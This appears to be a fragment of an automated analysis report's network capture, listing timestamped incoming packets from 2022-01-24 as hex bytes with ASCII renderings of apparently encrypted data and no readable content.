72 f4 fa eb af 23 34 07 85 b9 8f 1e b6 2b a6 5f 02 Data Ascii: ,V4GdG>jO@b'k$')+vu4CjWEdz>0,Wpa![GYY<imeb#tm.J8[Pez9^`TE?f+r`pR(msQBEkoUY~bH$DoKIqvr#4+_
2022-01-24 13:09:50 UTC	34	IN	Data Raw: 20 23 f7 9c 31 7e 4e 11 1f 8b 3e 8c fd 20 1e d9 11 44 2a 82 28 03 26 bc fe 22 ec 47 e8 cb 00 2e 6a bb 4d 96 ae 66 a2 70 15 c1 46 26 90 a5 53 07 52 ee fe 09 a9 b8 fd d0 ac d9 7d 0d 4a c8 4e 7d d2 62 96 e7 01 92 15 78 e8 86 e6 fb 60 b8 80 e4 8b 00 3b e6 8f 96 a7 be 7e 32 51 5c 72 22 78 fd b6 42 4b 42 d9 dd 9c a0 e3 10 12 1b be cf de ff be 41 ea 31 20 22 53 13 9a 86 1b 3f 43 a4 a4 b4 0f 5c 6b 63 8a b8 b6 9b dc ee 11 a2 d9 46 0e 26 5d a4 d4 8d be a7 64 ba 5d 49 7d 57 c9 81 e9 c8 1c f9 8b 87 c2 24 03 ee 59 57 03 5e 31 a1 ec f7 b4 62 de 84 a0 ab 8f c2 c7 9c 29 71 fa 1c 1f 57 c0 af c9 0b 9c 3d 1c ff cd d3 0f 84 0a e1 ea 9e 01 68 a6 be 29 2c 94 19 1a fe ed 15 ad ae da df 71 8b 98 85 1d 17 dc d3 8f 5c 33 0d 23 d1 ab 04 62 ef 1a bc 99 df 2a 0a bf 58 cc 7d 26 76 a6 Data Ascii: #1~N> D(&"G.jMfpF&SR}JN}bx`;~2Q\r"xBKBA1 "S?C\kcF&]d]I}W$YW^1b)qW=h),q\3#bX}&v
2022-01-24 13:09:50 UTC	36	IN	Data Raw: 15 c6 a6 c9 15 0e 6a cd ae dc 65 73 7b 13 c2 83 f0 9e dd 4f f4 5b 34 5b 84 92 cc 2b f5 20 09 1b 74 de 47 0a f0 a7 6d 98 3f 75 f2 70 b5 9b f8 07 f4 20 46 af 89 b9 26 99 b6 7a 80 23 5a c8 3c e9 34 0e ef de 5f 78 a6 c9 9a 42 7c 02 b5 b2 e0 c0 83 76 a2 be bc 40 d1 7c 5e 42 6f 5c fb c0 da 8f 0d c8 87 fe 0d 75 7a 4b b6 7f 3d 3a 1e 91 b3 8c 32 81 4b 5b 5e 28 a7 b1 9e a4 4f 0d f8 4d 3b d3 8a 6c 97 21 2d 2e e0 eb 2f f0 84 b3 25 e8 cf 3d 2a bd da 43 6f f0 a4 e3 6e 7f dc 08 c4 a4 ec a8 67 24 39 5e a8 b0 92 6d 4a 43 bf e9 23 b4 71 17 31 ee cd 72 a3 64 0e 00 c3 4c 80 54 07 58 3c 6b 27 37 27 6a 5d ad 56 35 b4 e8 8d a8 d1 b2 9f aa d3 43 7e 5a ab 6a b8 c9 97 84 7e e6 c7 88 95 1b ab ff f5 07 bf 2d 0c f0 a9 ff 1e 52 40 d9 2f 08 d3 ef b5 79 59 03 ff b1 58 8b 5a 1b 1d 81 58 Data Ascii: jes{O[4[+ tGm?up F&z#Z<4_xB\|v@\|^Bo\uzK=:2K[^(OM;l!-./%=*Cong$9^mJC#q1rdLTX<k'7'j]V5C~Zj~-R@/yYXZX
2022-01-24 13:09:50 UTC	37	IN	Data Raw: f4 02 a2 cf 64 06 2d 79 72 42 a1 af ab 64 58 5d 49 7d d9 1a 19 e9 c9 05 e8 82 a0 40 2f 03 f5 3c 5e 12 a0 3a 87 23 ff b4 f1 df 84 a0 33 39 ea ff 9d 3a 7e 3b 0d 0a 77 c0 be c3 15 9a c3 1d d3 d6 db df 26 27 e1 e5 ac 15 68 a7 a7 31 5c 95 4d 11 d6 fc 4e ad a4 d8 cc 7d 99 b3 ca 1c 06 d6 cc 8a a7 2d 28 cc d6 af a8 72 eb 19 aa aa c0 20 18 a9 5d c2 6d 2a 72 58 58 5d 36 06 fe d3 3a 9b c7 02 2c 30 a2 aa f3 48 c2 8c 15 0c 81 4e 27 eb 5e ff 2c 49 fc 68 d7 44 e4 4e b8 49 fd d3 ff ad 28 a0 14 18 3a dd 29 22 55 f3 fd b4 73 6b 36 6c 6a 66 47 44 4b a1 8e 9b f3 89 80 69 4e cf 49 11 61 48 50 4c 69 01 5d 66 e2 2e 21 72 2b 22 2f 03 40 7a 05 bf 63 c5 15 34 ee 7c 0f d2 15 7b ba d4 78 7a b4 51 90 5e 44 3e 25 5b b0 9a e3 ad 53 31 db 9c 1b 1c 03 d4 6f 0e 87 7b ca 7e db 7f 43 e1 e5 Data Ascii: d-yrBdX]I}@/<^:#39:~;w&'h1\MN}-(r ]m*rXX]6:,0HN'^,IhDNI(:)"Usk6ljfGDKiNIaHPLi]f.!r+"/@zc4\|{xzQ^D>%[S1o{~C
2022-01-24 13:09:50 UTC	38	IN	Data Raw: 8d 27 9a 48 ed a0 a3 02 2b d1 52 60 c9 3a cb 00 7a cf 08 ba 39 c5 26 6c 35 39 61 c2 89 f6 46 c4 44 97 75 0f 8e 6a 00 34 f0 ce 53 a1 62 67 84 ce 5d 86 54 07 25 3d 41 56 32 36 60 64 30 38 11 bc f9 a2 ad b2 34 98 c5 ff 57 6f 54 ad bc 83 62 87 8f 40 ff ee 8a 95 15 7d a4 f9 68 ad 04 18 fa 81 db 34 21 47 ca 23 fe cd ca 9d 44 4a 0d e7 af 44 ad 0d 0e 1d 8b 8c e9 b1 a3 6a 20 0e a0 c3 de 23 9a 69 ba 2f b2 8e e6 9c 35 ac 75 b5 24 4d 07 ba dd 50 a5 2e 54 84 bd 5a 10 49 36 fb b4 f3 64 a1 bf 8b a8 2f f2 94 df ec 9a b4 10 11 19 b3 d4 75 85 60 43 74 19 ec d7 56 b1 a3 a6 ef 64 1d 91 10 1d 83 41 cd da 54 52 35 a0 41 d4 9d 0b b6 9f 30 d2 44 ea 81 28 10 27 e6 c9 ad db f6 c5 c3 81 ad 19 77 de 69 ae 9e 01 97 ec 76 84 b4 8f 8b 3e 87 d8 aa 15 57 a0 73 1e 58 39 0c 18 09 ef 0a e9 Data Ascii: 'H+R`:z9&l59aFDuj4Sbg]T%=AV26`d084WoTb@}h4!G#DJDj #i/5u$MP.TZI6d/u`CtVdATR5A0D('wiv>WsX9
2022-01-24 13:09:50 UTC	40	IN	Data Raw: 3e 44 5c 23 eb 50 e5 24 bd fd 55 cc 5f 12 4d 9c d0 c6 f4 03 dc 60 e3 96 73 a6 d0 30 39 42 1c f8 82 84 52 a0 68 41 cd 43 4f 5c ab 9f 8e ee 68 8d bb 4c fb 48 04 64 71 e0 5a 97 0a fd 4a f5 3d 24 61 3f 39 3c ee 4b 56 16 9e 79 f4 87 ca 3d 8e 18 fe 3d dd a0 e4 77 69 96 4c 9a 4d 28 3e 34 40 d8 de e2 81 4d 34 c3 39 96 1d 03 df 63 06 fc b5 f4 57 57 7c 49 ed 5b 51 2d 8a 0f 4f c9 78 96 9a 7b b0 d1 21 b8 00 e7 fe f0 27 f2 33 e3 a5 88 da 90 94 22 1e ef 19 f7 67 31 c8 99 a5 ab 75 65 74 44 40 f8 f0 06 f2 67 84 2e 0c ff 1d 10 a4 ad e9 45 98 eb 1f 1d db f3 a8 eb 05 1f 5e 41 27 75 40 c2 a4 cb 67 82 d6 f9 4e d1 17 7c 60 8f 62 10 17 dc ea ce 10 83 6c 6a 7b be 9b 4a 39 3c 92 a5 59 11 f6 1a 00 b1 6b 59 8f 59 1c 1f 66 f7 a3 f4 06 7a 14 ba eb 15 fb 8d de 4f d4 1c e0 59 84 9e b0 Data Ascii: >D\#P$U_M`s09BRhACO\hLHdqZJ=$a?9<KVy==wiLM(>4@M49cWW\|I[Q-Ox{!'3"g1uetD@g.E^A'u@gN\|`blj{J9<YkYYfzOY
2022-01-24 13:09:50 UTC	41	IN	Data Raw: bc 66 bb 3f 9d 18 90 7b d0 9a 86 a0 76 6a 64 3a 49 3c 25 b5 e9 4e a0 a3 8b ec 2f f9 dd df e2 a2 b4 1e 0a 19 b3 73 75 37 08 42 67 4f ec d9 4d aa 93 ae f4 f4 1f 91 4c 79 83 41 82 a9 e8 43 46 10 4a a7 2d 01 b0 eb 0b cc 58 c6 12 3f 12 2d c8 63 ef d8 f0 eb cf 99 af 13 59 9e af ae 94 27 55 e5 4c b0 ab 34 8b 34 81 d8 10 16 57 ac 85 3a 5e 47 37 31 a3 ea 22 f4 44 e8 c7 20 79 60 ad 43 30 00 75 a7 f8 cd dd 6e 29 9b 7b 57 0a ed d9 fe 03 b2 b3 d6 ef b8 d0 66 d6 25 56 65 7c c8 0d 80 e6 01 9e 06 60 db 82 c0 7d 60 b8 8b ee 55 21 1e d2 f4 96 a9 ae 6d 35 44 4d 6a 19 78 a1 bc 9c 4b 1a f3 dd 8d d2 49 10 12 11 b4 9f a0 48 64 41 ff 03 37 20 52 0e 82 bb 18 02 45 8c bc 96 0f 5a 15 a7 a6 b1 be 2a 19 cb 39 9f cf 75 06 3e 5f b4 43 8d b4 73 4c fa 22 7b 76 55 a2 31 fe ca 16 eb b5 96 Data Ascii: f?{vjd:I<%N/su7BgOMLyACFJ-X?-cY'UL44W:^G71"D y`C0un){Wf%Ve\|`}`U!m5DMjxKIHdA7 REZ*9u>_CsL"{vU1
2022-01-24 13:09:50 UTC	42	IN	Data Raw: cb 21 f2 b3 98 eb 3d fb 31 1f 73 02 39 7f 0c 7c bf b5 b3 5f 8c 61 6c 78 64 e1 1c 35 70 09 2f 0b 3a 0a 14 be a9 f4 46 b5 86 9e de 24 f5 88 ca a0 1c 5f 73 48 da 41 c2 df d8 6a e8 d1 d4 f5 d0 17 7d 71 88 bf a0 61 f5 e1 d2 18 95 7f 7a 43 3b 47 4b 33 ca 81 a0 52 8b e5 13 11 b6 64 53 d0 5c 1d 10 7a df 87 f5 1d 40 7e 15 c8 16 f1 9e be 5e dd 62 23 e2 84 94 a9 af f0 3f 19 22 c5 cc 6e 28 bd 06 6e 9e 11 cb d7 70 bf 80 da 28 ba 0c 46 a9 ec 38 d9 98 bb 43 29 32 73 e6 73 ce 34 08 cd 60 6f 78 ac d2 a5 94 15 61 99 b7 9e 53 a8 71 80 0c b5 52 fe 7c 13 41 6f 50 fb c3 db 8f 0d d5 86 72 64 76 7c 40 f1 4d 3f 3a 12 f3 3a 9f 1b a3 28 37 ea 2f 8f 2d f0 22 44 1c db 72 38 57 8b 6a f2 d9 a4 2f ea f0 36 eb 85 3d 4b eb c9 48 81 2a db 49 6d 8e 39 ca 00 76 b3 88 aa 33 e7 bf 02 b2 32 4c Data Ascii: !=1s9\|_alxd5p/:F$_sHAj}qazC;GK3RdS\z@~^b#?"n(np(F8C)2ss4`oxaSqR\|AoPrdv\|@M?::(7/-"Dr8Wj/6=KH*Im9v32L
2022-01-24 13:09:50 UTC	44	IN	Data Raw: 4d 07 74 ed fe 05 af 33 f9 d7 b8 d1 60 00 33 54 c3 42 d4 0d 81 44 09 8c 12 54 30 83 ce 6d 7a ab 8f ee 44 14 08 30 b9 ba a4 a3 7e 30 45 47 5f 00 86 fc 90 9e 60 46 d8 7c 9b b5 db 94 10 1b b8 8e 53 7d 65 41 fa 27 28 34 57 84 95 82 1b 03 e1 ac a9 9d 1b 48 6d ec 89 b1 b4 f5 04 ea 00 ac d9 62 90 23 73 a4 e0 8d be a7 5d f8 4a d9 5b 70 af 0f 73 e0 07 ed 9d a5 83 1a 03 e4 37 69 16 5e 3b a1 1a cb 9d 55 d4 fd 95 bf 85 eb 8e a3 29 7b 25 e2 12 7e c0 db db 0a 8c 26 36 ff cd dd 14 ab 24 e1 b8 84 01 68 f9 ad 19 3e e7 f7 1b fe e7 44 ab d0 e0 c8 62 8a 88 d7 1e 17 da fb dd 5a 2c 02 f5 c8 85 0d 75 84 d5 26 95 ca fe 17 9f 70 ea 78 39 72 54 61 6f 21 f8 f5 21 39 85 aa 23 2d 21 ac 9d f9 b4 c3 a6 34 77 5e 4f 21 c3 58 e3 3f 45 93 bf dd 59 10 91 9a 64 ed cb 00 52 dd b3 2f 2a 3a cc Data Ascii: Mt3`3TBDT0mzD0~0EG_`F\|S}eA'(4WHmb#s]J[ps7i^;U){%~&6$h>DbZ,u&px9rTao!!9#-!4w^O!X?EYdR/*:
2022-01-24 13:09:50 UTC	45	IN	Data Raw: d5 3e 9e 34 57 ad f7 22 30 b1 6d 6a 8a 3b 5b 35 5a ea 3e 20 07 4b 5e 7e a4 cf 65 7d 3c d0 b4 b4 85 7f 57 77 a8 a5 d7 7a 2b 55 37 4b 47 8e d2 56 d1 a7 d1 d8 ae dc 6f 61 ac 53 84 e4 2d 36 03 56 aa 92 0a a5 31 48 6f 99 9e 20 f0 6f 45 1c db 73 64 d2 54 1c 8b 94 2e 2e ec e9 2f f3 a7 b3 89 e8 cf 3d 6d 03 d9 43 63 f0 87 da 07 13 f8 0c ab 35 fc a2 7c 31 5c 6a 83 98 fb 7f 40 6d 55 7c 22 b2 14 2c 1a c6 bb 77 b2 68 0e 84 c3 4c 80 54 03 25 d2 43 56 3e 1d c1 8b c4 a8 eb a8 e8 aa c9 85 25 9e ab f5 59 7e 5c c9 8b ab e3 85 e0 11 90 c4 82 49 cd 6e 90 dd 30 be 05 12 e3 a4 86 8c 21 41 d3 2e 08 fa ef b5 79 94 0f eb 96 4e af 35 0e 1d c0 66 e9 a0 a8 7d f6 1d f0 d2 d7 32 e9 56 8a d0 f1 70 f7 92 34 7a 66 bb 35 43 16 b5 53 e7 9a 86 ac 7b 42 5c f4 48 36 fb 61 ee 64 a1 aa 8b ec 2f Data Ascii: >4W"0mj;[5Z> K^~e}<Wwz+U7KGVoaS-6V1Ho oEsdT../=mCc5\|1\j@mU\|",whLT%CV>%Y~\In0!A.yN5f}2Vp4zf5CS{B\H6ad/
2022-01-24 13:09:50 UTC	46	IN	Data Raw: ea ff 90 29 7b 24 06 19 7d c1 ad c9 0a 8c 06 1c ff cd 67 0f 9b 27 14 e4 84 01 7e a7 ad 19 2f 94 4d 1b fe ed 4e ad a8 cb c9 62 96 a1 c0 1c 09 dd d3 9e 4c 2c 04 dd ca 87 0d 72 f0 23 25 95 80 21 19 ba 29 dd 78 28 0b e2 49 57 2b f2 81 c3 39 83 de 20 e6 22 a8 b3 f9 d9 fe a0 1c 3e 70 48 21 e0 9c fe 3e 43 fc a7 c9 7c 32 78 94 41 cf ef 04 54 dc 96 3f 12 3a c6 fe 34 43 0d fc e6 46 53 8c 67 42 ac 5b 5c 5e bc e1 b7 f9 96 86 9b 47 8c eb 01 64 6a e9 45 7a 05 c7 5a ef 16 e2 61 2e 3d 33 1e 5b 77 8e a6 79 b2 d7 35 c2 7b 36 1f 3e dd bd c5 77 41 95 4e 9a 47 59 51 09 51 ab 6e f1 87 6f 2a da b4 89 0c 05 f6 bc 1d ed ab 8d ce db 7f 43 9f eb 40 35 86 48 d7 cb 78 9a 2b 61 b9 c4 0c 6f 8e cc f8 9f 97 e0 23 f8 c1 8c fa 29 8f 31 19 62 0e cf be 2a 54 8e da 02 54 9f 7e 30 52 64 e1 0d Data Ascii: ){$}g'~/MNbL,r#%!)x(IW+9 ">pH!>C\|2xAT?:4CFSgB[\^GdjEzZa.=3[wy5{6>wANGYQQnoC@5Hx+ao#)1bTT~0Rd
2022-01-24 13:09:50 UTC	48	IN	Data Raw: bf 81 4d 8a 4f 1b d0 3d 40 57 34 21 44 e9 3b 57 3f d1 df a6 bc b8 0e ad bb dc 7d b1 51 bc b6 c4 7e 84 8f 4c bc e1 99 93 02 7e 9d 2b 04 be 03 0d e6 81 b6 37 21 4b ce bf 08 1f ec b5 75 5f 1b c5 ff 48 85 3f 18 87 ee 74 eb a0 ac 6c f0 35 76 d1 d7 34 e5 7d 88 d0 4b 77 e6 94 4d 69 67 bb 3f 52 1c da 94 e7 9a 8c 90 b0 bc a3 c5 97 20 ea bf 9a 5f a1 bf 8a c0 23 e8 d1 aa c5 80 b4 11 7f 4e b3 72 7f eb 29 4a 6c d5 ff df 46 a2 82 a6 61 73 23 eb ee 86 7c 9f c9 8c c0 65 35 aa 40 b4 20 78 0c 95 3a c7 53 ea 02 28 10 27 10 49 a8 f1 f7 c7 e7 81 ec 27 5f f1 6b ae 94 2d dd eb 69 98 d6 35 8b 3e 2d f1 28 16 41 a6 5b 3a 58 39 06 30 a3 ee 0a e3 40 e8 c1 08 fb 62 ad 45 d1 18 77 a7 eb a2 1b 6e 33 91 a5 58 34 f5 eb fe 6b b9 be fe a2 b8 d0 7d 7b 9f 50 4f 77 de 25 60 e5 01 9e 0a 02 c5 Data Ascii: MO=@W4!D;W?}Q~L~+7!Ku_H?tl5v4}KwMig?R _#Nr)JlFas#\|e5@ x:S('I'_k-i5>-(A[:X90@bEwn3X4k}{POw%`
2022-01-24 13:09:50 UTC	49	IN	Data Raw: 84 9b 69 4e cf 58 18 77 72 e4 5d 7b 15 2f 48 ce 29 29 72 20 22 2b 03 58 7a 05 a7 63 d6 15 34 ee 7a 36 27 3e dd bd c7 77 76 aa 5d 88 4d 5f 2c 2b 74 55 65 ce 8d 41 2f d3 db 90 1c 03 d4 6f 38 fe bf e2 6e c8 60 6a 15 f8 6c 38 8c 2f d0 cf 17 b6 3a 6a ae dd 00 b1 9f cc ef e2 39 f5 dd f3 99 97 c2 da 95 22 1e 6c 1d f4 62 29 45 9a aa ba ab 9e 58 43 56 77 ec 09 e1 63 0a 3f 0d fe 06 15 51 b8 c9 4c 9a e6 76 ac 84 f3 a2 c2 99 13 4f 48 5e c5 7c 5f bf d7 0f db d0 c0 e5 c3 1d 63 63 9b 1f a0 07 ce ff c1 fc 94 53 62 52 31 8c d0 11 d9 83 b4 4e 9d cd 3c 11 b6 70 47 e7 52 1e 1f 60 c0 9a e7 14 70 6a 07 f1 eb f0 b2 dd 20 4e 73 50 52 97 92 bf af e6 20 12 18 61 ea 90 23 b9 ae 7c 93 00 35 e0 7d a0 ad c2 3d 92 32 54 b6 f4 d0 26 b5 a5 7a 80 27 e9 c8 a9 e9 34 0e d1 60 70 78 ac d2 a5 Data Ascii: iNXwr]{/H))r "+Xzc4z6'>wv]M_,+tUeA/o8n`jl8/:j9"lb)EXCVwc?QLvOH^\|_ccSbR1N<pGR`pj NsPR a#\|5}=2T&z'4`px
2022-01-24 13:09:50 UTC	50	IN	Data Raw: 73 a8 93 a9 fe d5 0d 94 7f 5f 81 41 da b8 f9 7a ca a9 4a a1 48 21 b4 95 3c cb 49 d3 55 3b 11 2d c4 5a be cc 26 fe f7 90 bd 02 48 cf 74 51 6b d2 9a e2 7e 4e 8f 3d 9a 37 9c e3 16 b5 aa 59 a4 e4 4d 1c 2e 07 a3 ee 00 f0 54 9b 7b 08 38 69 a0 6d 20 19 77 ad 20 a0 1d 44 20 bb a5 18 33 c5 ee fe 03 b8 be df d7 b8 d0 a9 0a 25 50 a9 7f d4 0d 95 e6 01 98 1c 7c f9 83 d5 57 67 b8 09 ec 55 11 64 ce b8 87 d4 0e 6d 35 4f 5c 72 41 78 fd ba f3 af 45 f3 d7 8f a5 8d 2c 12 1b b4 94 f6 54 67 41 fd 27 5e 1e 52 08 a0 aa 1b 06 43 a2 cb 3b 0e 5c 70 6c af de 04 f5 17 e4 02 ad c6 1a 33 32 77 86 52 88 ad bb 5a ef 49 71 62 57 a6 19 f8 de 07 f8 07 bc 5c 0d 02 e0 36 47 13 51 13 8f 32 f9 96 7d dc 80 aa b9 ad c4 fd 9c 2f 53 c1 1d 19 77 e8 33 c9 0a 86 2e 10 ee c1 b2 eb 9a 27 eb f7 83 10 64 Data Ascii: s_AzJH!<IU;-Z&HtQk~N=7YM.T{8im w D 3%P\|WgUdm5O\rAxE,TgA'^RC;\pl32wRZIqbW\6GQ2}/Sw3.'d
2022-01-24 13:09:50 UTC	52	IN	Data Raw: c9 a2 24 5e 47 42 04 41 1c bb fd 48 a4 d1 c0 e5 c3 1c 0f cb 88 0d aa 1d f4 d8 dd 02 9f a1 79 45 11 9d 60 39 2d 80 f5 7c 8b e5 12 11 b6 7a ea a7 c9 1f 5b 60 df 87 0b 06 70 7b 1a ea 15 f1 84 d7 5e dc 73 50 58 84 92 a3 bc f4 2a 02 0a 7e dc 6f 22 95 b1 6d 9e 17 f9 f3 70 be 91 e1 2b 92 4c 44 a9 e6 52 27 99 ad 18 30 31 73 ea 51 c2 1a 0a c7 4e 52 0b b7 d9 b3 6c 1f 29 a1 b0 8f 51 aa 55 a8 af bc 7a ed 50 37 47 47 7e d3 56 d1 a7 36 d9 ae dc 4b 6a 7d 65 cd ec 3c 3c 3c a3 b9 9e 11 81 35 5c 5e 28 a7 03 9f a4 4f 73 cd 64 57 d6 a1 6c 8b 0c 2c 2e e0 d0 22 8d 1a 9a 48 e1 a0 83 03 2b d1 50 6c d9 6f ca 00 7c ce 07 83 8a ec a8 67 26 37 3f a3 9a fd 68 59 40 90 6e 26 db c1 07 18 cc d2 0c a2 62 6b f8 bc 4d 8a 4f 1e 40 2d 21 57 34 27 7e 7f 13 28 34 be f3 b7 ba af 23 b6 bc dd 55 Data Ascii: $^GBAHyE`9-\|z[`p{^sPX*~o"mp+LDR'01sQNRl)QUzP7GG~V6Kj}e<<<5\^(OsdWl,."H+Plo\|g&7?hY@n&bkMO@-!W4'~(4#U
2022-01-24 13:09:50 UTC	53	IN	Data Raw: 5a 1c 6f 70 bb 9c 4b 45 e0 d5 8d a9 e5 6e 77 1b be 9d 7c 6b 6d 55 ef 03 e9 23 52 02 bb 84 0f 2a 5d a0 a4 92 18 d1 7d 61 a6 b0 a7 fc 06 e6 07 bf 43 fe 0c 32 76 2e 52 85 aa b9 64 35 5d 49 7d 44 a0 0d c1 d7 12 ed 9b b9 de 22 03 e4 37 55 16 4a 13 08 32 f9 96 21 52 84 aa be 96 ef ee 99 20 6d 2d 92 ae 12 ea ae c9 00 80 15 8b ff cd d7 07 f4 31 e0 e4 8e 12 6c b6 a9 31 b3 94 4d 11 f5 33 5f 88 86 fc c9 62 84 b3 c7 08 1c f4 eb 9e 59 26 da dd d7 ad 0d 73 ea 03 26 95 c0 20 0c ba 86 2e 78 28 62 58 49 56 3a c8 fc ff 30 82 d4 08 5a 21 a8 a4 9d 0c c3 a0 16 3e 75 41 24 eb 47 c9 1c 43 fc 73 f5 79 1e 4f 92 69 e1 fc 00 58 c4 bb 16 17 12 fd 23 3d 48 20 f7 eb c0 53 8c 67 61 bb 8f 5c 58 ab 9f 8f ec be d3 97 4f e5 56 09 4c 41 e0 4c 6f 23 f3 4d e2 28 08 3c 2e 3d 24 03 4e 73 3c 97 Data Ascii: ZopKEnw\|kmU#R*]}aC2v.Rd5]I}D"7UJ2!R m-1l1M3_bY&s& .x(bXIV:0Z!>uA$GCsyOiX#=H Sga\XOVLALo#M(<.=$Ns<
2022-01-24 13:09:50 UTC	57	IN	Data Raw: 2a dd 4e b8 d0 d8 c3 e5 81 ab 1f 49 f8 7d 86 15 2f 8b ed 7f 15 9b 34 8b 3f 99 e4 3c 3e f4 a6 5b 30 40 b5 39 30 a3 ef 22 5b 46 e8 cb 20 62 63 ad 4f 0b 11 64 a1 d5 f1 13 67 3e 1c a2 59 2f c4 fd f7 12 b1 a8 ef d1 34 ef 6c 08 24 f2 5e 74 c0 25 2e e6 01 92 17 79 fe 13 42 4c 60 b8 8b c6 b8 10 1e c4 90 cc a7 b4 67 1d 96 57 5a 10 50 29 bd 9c 41 6c d7 dd 9c ab ff 17 05 cd b5 9e cf 7c 72 97 ca 29 36 29 43 0e bd 54 08 04 52 a2 b5 9c 3e fb 72 6b 78 a3 9c c3 17 ee 1b 80 e1 77 0c 34 7d a4 7b 8d be a7 92 fc 5a 63 36 49 a6 19 e9 c8 16 ed 9d af 53 25 33 e7 36 41 32 5d 3b ab 20 f9 9c 55 c4 84 aa be 96 da fa 9c e3 7b 24 1c 91 7d c0 be df 19 89 05 a7 ff cd dd 0f 8a 22 f8 1a 85 2d 6d b1 a1 03 3c 91 4d 0a fb f7 b0 ac 82 c4 df 60 e1 6b c0 1c 1d c4 09 8d 5d 21 1f ce d5 87 1c 76 Data Ascii: *NI}/4?<>[0@90"[F bcOdg>Y/4l$^t%.yBL`gWZP)Al\|r)6)CTR>rkxw4}{Zc6IS%36A2]; U{$}"-m<M`k]!v
2022-01-24 13:09:50 UTC	61	IN	Data Raw: 0d e7 b6 58 8b 22 d8 0e 8f 43 e7 b1 b8 4c 5e c3 a6 f7 ff 05 8a 57 80 c3 42 59 cf 92 22 70 b8 bb 33 69 16 f4 4f e7 9a 86 aa 7b 42 5a 3a 49 36 eb b7 ef 64 b7 bd 8b ec 20 f9 db df e4 80 b4 11 0b 29 b0 72 59 37 38 42 61 03 ec c6 55 a9 bb db ef c4 16 94 07 af 19 4a db ad c0 26 35 aa 40 b1 bd 01 68 87 12 fa 58 c2 30 00 3e 2f ce 4d a4 f3 c8 ed e7 8b 73 13 59 db 68 be 94 2d 8b eb 69 98 84 2c 8b 2c 97 f0 28 17 44 96 59 3a 71 39 06 30 a6 ee 0a f2 50 e3 ea 13 38 64 ba bb 19 35 75 bf f5 a2 1c 78 d7 90 89 5b 38 ce ee f9 1b 46 bf d2 d5 93 d2 47 eb 27 53 20 e0 d4 0d 8a cc 01 98 06 67 c9 87 ce df 61 b8 8a 63 55 11 0f e6 96 94 a7 b2 66 46 ff 56 5a 10 72 e2 a6 b4 f0 44 f3 d7 8f a4 db 3e 10 1b b8 95 f6 54 67 41 fd 38 24 33 57 20 cd 86 1b 04 6b 80 a4 94 05 74 4b 61 a6 bb 98 Data Ascii: X"CL^WBY"p3iO{BZ:I6d )rY78BaUJ&5@hX0>/MsYh-i,,(DY:q90P8d5ux[8FG'S gacUfFVZrD>TgA8$3W ktKa
2022-01-24 13:09:50 UTC	65	IN	Data Raw: 7b 35 14 05 83 c1 83 c1 1b 8b 24 00 63 d0 ce 07 9b 36 e9 fb 93 ff 69 8b be 1f 2d 82 4f 95 49 fc 4b bb c1 cf cb 62 84 86 df 04 04 d4 d3 8f 51 34 fa dc fc 8c 13 fe c0 13 26 94 d3 27 00 a9 50 dd 69 31 65 a6 48 7b 28 e9 f8 e5 26 a0 48 16 3f 29 a8 a4 e6 a1 3d a1 30 37 45 5c 2f eb 50 e9 24 bd fd 55 d4 48 1d 57 8b 2a 59 e0 13 5a d7 af 0f 0d 2c 32 22 11 4f 05 f5 8c 15 56 8e 6d 60 6c 47 4b 4b a3 8e 9b f1 89 86 69 4e cf 52 11 63 7d f9 d0 76 00 c2 41 e2 3f 28 7f d0 3c 0e 1a 5b 7d 0f aa 32 50 f4 3c d1 79 1e c5 35 c2 b7 2a 73 45 a3 4c 14 fa 59 e4 23 87 26 4f e2 81 46 2d de ab 8e 0e 0b de 61 16 f2 b9 1c 7e f6 74 41 fc 96 68 34 9d 2d de df 6b 98 38 7b a0 dd 31 5c 8c e0 f5 f8 3e 8e 04 f3 b5 94 e5 3f 87 2a 1e 62 00 fd 8e 28 78 81 a4 b4 42 80 26 d8 5b 77 e9 16 fa 78 07 31 Data Ascii: {5$c6i-OIKbQ4&'Pi1eH{(&H?)=07E\/P$UHWYZ,2"OVm`lGKKiNRc}vA?(<[}2P<y5sELY#&OF-a~tAh4-k8{1\>?*b(xB&[wx1
2022-01-24 13:09:50 UTC	69	IN	Data Raw: 8b 1a ce be 80 2a b3 6d 35 44 42 4e 0e 50 5e bc 9c 41 6c 6f dd 9c ab e0 18 03 12 92 c0 cf 73 4d cf fa 2b 2a 0f 02 19 a2 ae 57 13 4b 8c 2a 95 0f 56 57 22 d5 93 b6 f4 11 fd 1b b9 c5 64 05 1a 60 8d 43 8b d1 89 4e fc 5a 58 7d 44 ae 31 fe c9 16 eb f2 89 51 25 05 f5 3c 69 96 5a 3b ad 5d d3 9e 55 d8 95 a0 97 d2 e8 ff 9a 46 53 26 1c 1f 7a d1 a5 a6 19 8d 3d 16 21 c1 f5 38 9b 27 eb cc bc 01 68 ad 73 19 3e 99 5a cd ed e0 5f a0 bf c5 47 d5 b1 22 3e e3 e8 cd d8 89 8f 3f 0f cc db 96 01 fd 5c 2c 7f 6b 3f df 1e 90 58 dd 78 78 64 58 49 57 21 f8 ff 79 39 83 d4 33 2d 21 a8 74 ef b6 c3 ac 1c 34 5d 55 27 eb 40 fa 0f 47 fc 54 dc 59 1a ee 94 41 d4 8f ba 52 d7 b4 0d 0d 20 e4 98 3d 42 07 d4 04 7e 53 8a 45 4e 66 58 56 54 a3 a6 bb f9 96 86 ae 47 e2 5b 00 6c 48 d9 4d 69 01 f9 51 e3 Data Ascii: m5DBNP^AlosM+WK*VW"d`CNZX}D1Q%<iZ;]UFS&z=!8'hs>Z_G">?\,k?XxxdXIW!y93-!t4]U'@GTYAR =B~SENfXVTG[lHMiQ
2022-01-24 13:09:50 UTC	73	IN	Data Raw: 5c 88 b6 95 3e e7 7a c0 39 55 93 2d ce 4f 84 db f0 ed f4 b1 af 13 77 f1 69 ae 92 2d 8b fa 7f 93 b7 2f 8b 39 9a 0e 29 3a 55 be 50 3a 5f 2f f8 31 8f ec 1d e8 46 ef d9 f6 39 4f af 6e 1a 32 94 a5 85 26 1b 6e 2d bb 87 5b 2c b8 6a fe 03 bc 94 fe d7 b8 c3 5c 0a 25 78 4f 7d d4 08 80 e6 10 8e 0d 57 e2 82 c9 70 9e b9 a6 ec 4d 1a 1e c9 ae 68 a6 98 6f 22 4e 56 5d 02 86 fc 90 9e 60 46 d8 3e 9e da 76 10 12 1f 94 bb dc 79 18 c4 fb 2b 24 08 52 08 aa 91 2b 00 43 8c a4 94 0f 59 7a 61 b7 a7 bf df 0c ee 16 bf 31 74 20 30 6f 87 43 8a a8 53 4d d0 5e 5e 7c 55 a1 01 17 c9 3a ef b6 ad 78 c6 01 9f b0 41 02 5a 11 89 30 fa e1 d3 de 84 